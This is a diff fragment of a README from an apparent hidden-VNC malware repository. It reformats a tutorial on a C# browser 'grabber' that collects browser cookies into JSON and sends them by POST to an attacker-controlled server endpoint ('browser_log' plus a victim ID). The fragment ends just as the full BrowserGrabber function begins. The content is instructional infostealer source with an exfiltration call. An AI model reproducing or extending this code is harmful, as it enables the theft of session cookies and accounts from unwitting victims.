DevilBot000/HVNC-HTML/README.md

                     }
                     browserJson["cookies"] = cookiesArray;
 [/CODE]
+After writing all the necessary data to the browser object, the browser object is added to the main object:
+[CODE]

+    mainJson[browserName] = browserJson;
-After writing all the necessary data to the browser object, the browser object is added to the main object: [CODE=csharp]mainJson[browserName] = browserJson;[/CODE]Since all this code is in a foreach loop, this code will be repeated over and over again , until the entire list from the dictionary with paths ends.
+[/CODE]Since all this code is in a foreach loop, this code will be repeated over and over again , until the entire list from the dictionary with paths ends.
-Sending JSON to the server at browser_log plus a unique user ID: [CODE=csharp]await SendPostRequestAsync($"{Variables.ip}/browser_log/{Variables.uniqueId}", mainJson.ToString());[/CODE]
+Sending JSON to the server at browser_log plus a unique user ID:
+[CODE]

+    await SendPostRequestAsync($"{Variables.ip}/browser_log/{Variables.uniqueId}", mainJson.ToString());
+[/CODE]
 For those who don't want to learn the code line by line, here is the complete code for the function.

+[CODE]

-[CODE=csharp]static async Task BrowserGrabber()
+    static async Task BrowserGrabber()

     {

     try